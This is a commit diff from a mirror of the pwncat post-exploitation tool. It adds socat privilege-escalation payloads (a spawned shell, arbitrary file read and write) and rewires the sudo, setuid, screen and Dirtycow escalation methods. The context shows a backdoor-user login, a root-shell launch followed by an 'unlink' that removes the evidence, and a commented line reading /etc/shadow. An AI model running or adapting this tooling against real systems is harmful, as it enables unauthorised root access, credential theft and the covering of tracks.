mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-30 20:34:15 +01:00
Changed privesc methods to use run() rather than process()... seems to work?? Added socat as a gtfobins
This commit is contained in:
parent
80c4e9839a
commit
84a5cb7deb
@ -11,6 +11,7 @@
|
|||||||
"payload": "{command} 2>/dev/null",
|
"payload": "{command} 2>/dev/null",
|
||||||
// This is used to pass arguments to the application (auto-merged
|
// This is used to pass arguments to the application (auto-merged
|
||||||
// into "{command}".
|
// into "{command}".
|
||||||
|
|
||||||
// IF YOUR COMMAND TAKES ARGUMENTS, YOU MUST SUPPLY THEM HERE.
|
// IF YOUR COMMAND TAKES ARGUMENTS, YOU MUST SUPPLY THEM HERE.
|
||||||
"args": ["if={lfile}"],
|
"args": ["if={lfile}"],
|
||||||
// Prepends arguments, if any to the "args" for setuid context.
|
// Prepends arguments, if any to the "args" for setuid context.
|
||||||
@ -261,13 +262,41 @@
|
|||||||
"type": "shell",
|
"type": "shell",
|
||||||
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
|
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
|
||||||
"args": ["--no-stop", "-q", "$TF"],
|
"args": ["--no-stop", "-q", "$TF"],
|
||||||
"exit": "exit"
|
"exit": "exit\n"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
|
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
|
||||||
"args": ["--no-stop", "-q", "$TF"],
|
"args": ["--no-stop", "-q", "$TF"],
|
||||||
"exit": "exit"
|
"exit": "exit\n"
|
||||||
}
|
}
|
||||||
|
],
|
||||||
|
"socat": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["STDIN", "EXEC:{shell}"],
|
||||||
|
"exit": "exit\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-u", "FILE:{lfile}", "STDOUT"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command} 2>/dev/null",
|
||||||
|
"args": ["-u", "STDIN", "CREATE:{lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "base64",
|
||||||
|
"payload": "{base64} -d | {command} 2>/dev/null",
|
||||||
|
"args": ["-u", "STDIN", "CREATE:{lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
}
|
||||||
|
|
||||||
]
|
]
|
||||||
}
|
}
|
@ -16,5 +16,24 @@ def which(path: str, quote=False):
|
|||||||
|
|
||||||
gtfo = GTFOBins("data/gtfobins.json", which)
|
gtfo = GTFOBins("data/gtfobins.json", which)
|
||||||
|
|
||||||
all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
|
||||||
print(all_binaries[0].build(shell="/bin/bash", suid=True))
|
binary_to_test = "socat"
|
||||||
|
capabilities_to_test = Capability.WRITE
|
||||||
|
our_shell = "/bin/bash"
|
||||||
|
|
||||||
|
socat = gtfo.find_binary(binary_to_test)
|
||||||
|
print(socat)
|
||||||
|
print(vars(socat))
|
||||||
|
|
||||||
|
methods = socat.iter_methods(
|
||||||
|
which(binary_to_test), caps=capabilities_to_test, stream=None
|
||||||
|
)
|
||||||
|
for method in methods:
|
||||||
|
print(method)
|
||||||
|
print(method.build(lfile="/tmp/test", data="hello")[0])
|
||||||
|
break
|
||||||
|
# print(method.build(shell=our_shell)[0])
|
||||||
|
# print(method.build(lfile="/etc/shadow", suid=True)[0])
|
||||||
|
|
||||||
|
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
||||||
|
# print(all_binaries[0].build(shell="/bin/bash", suid=True))
|
||||||
|
@ -21,8 +21,8 @@ from pwncat import util
|
|||||||
|
|
||||||
# privesc_methods = [SetuidMethod, SuMethod]
|
# privesc_methods = [SetuidMethod, SuMethod]
|
||||||
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
|
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
|
||||||
privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
|
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
|
||||||
# privesc_methods = [SuMethod, SudoMethod]
|
privesc_methods = [SuMethod, SetuidMethod]
|
||||||
|
|
||||||
|
|
||||||
class Finder:
|
class Finder:
|
||||||
@ -302,8 +302,11 @@ class Finder:
|
|||||||
|
|
||||||
# Check if we ended up in a sub-shell without escalating
|
# Check if we ended up in a sub-shell without escalating
|
||||||
if self.pty.getenv("SHLVL") != shlvl:
|
if self.pty.getenv("SHLVL") != shlvl:
|
||||||
|
|
||||||
# Get out of this subshell. We don't need it
|
# Get out of this subshell. We don't need it
|
||||||
self.pty.process(exit_script, delim=False)
|
# self.pty.process(exit_script, delim=False)
|
||||||
|
self.pty.run(exit_script, wait=False)
|
||||||
|
self.pty.recvuntil("\n")
|
||||||
|
|
||||||
# Clean up whatever mess was left over
|
# Clean up whatever mess was left over
|
||||||
self.pty.flush_output()
|
self.pty.flush_output()
|
||||||
|
@ -90,7 +90,9 @@ class DirtycowMethod(Method):
|
|||||||
raise PrivescError("backdoor user not created")
|
raise PrivescError("backdoor user not created")
|
||||||
|
|
||||||
# Become the new user!
|
# Become the new user!
|
||||||
self.pty.process(f"su {self.pty.privesc.backdoor_user_name}", delim=False)
|
self.pty.run(f"su {self.pty.privesc.backdoor_user_name}", wait=False)
|
||||||
|
self.pty.recvuntil(": ")
|
||||||
|
|
||||||
self.pty.client.send(self.pty.privesc.backdoor_password.encode("utf-8") + b"\n")
|
self.pty.client.send(self.pty.privesc.backdoor_password.encode("utf-8") + b"\n")
|
||||||
|
|
||||||
return "exit"
|
return "exit"
|
||||||
|
@ -148,7 +148,7 @@ class ScreenMethod(Method):
|
|||||||
self.pty.run("popd")
|
self.pty.run("popd")
|
||||||
|
|
||||||
# Start the root shell!
|
# Start the root shell!
|
||||||
self.pty.process(f"{rootshell}", delim=False)
|
self.pty.run(f"{rootshell}", wait=False)
|
||||||
|
|
||||||
# Remove the evidence
|
# Remove the evidence
|
||||||
self.pty.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}")
|
self.pty.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}")
|
||||||
|
@ -93,7 +93,8 @@ class SetuidMethod(Method):
|
|||||||
payload, input_data, exit_cmd = method.build(shell=self.pty.shell, suid=True)
|
payload, input_data, exit_cmd = method.build(shell=self.pty.shell, suid=True)
|
||||||
|
|
||||||
# Run the start commands
|
# Run the start commands
|
||||||
self.pty.process(payload, delim=False)
|
# self.pty.process(payload, delim=False)
|
||||||
|
self.pty.run(payload, wait=False)
|
||||||
|
|
||||||
# Send required input
|
# Send required input
|
||||||
self.pty.client.send(input_data.encode("utf-8"))
|
self.pty.client.send(input_data.encode("utf-8"))
|
||||||
|
@ -212,7 +212,8 @@ class SudoMethod(Method):
|
|||||||
)
|
)
|
||||||
|
|
||||||
# Run the commands
|
# Run the commands
|
||||||
self.pty.process(payload, delim=True)
|
# self.pty.process(payload, delim=True)
|
||||||
|
self.pty.run(payload, wait=True)
|
||||||
|
|
||||||
# This will check if the password is needed, and attempt to send it or
|
# This will check if the password is needed, and attempt to send it or
|
||||||
# fail, and return
|
# fail, and return
|
||||||
|
Loading…
Reference in New Issue
Block a user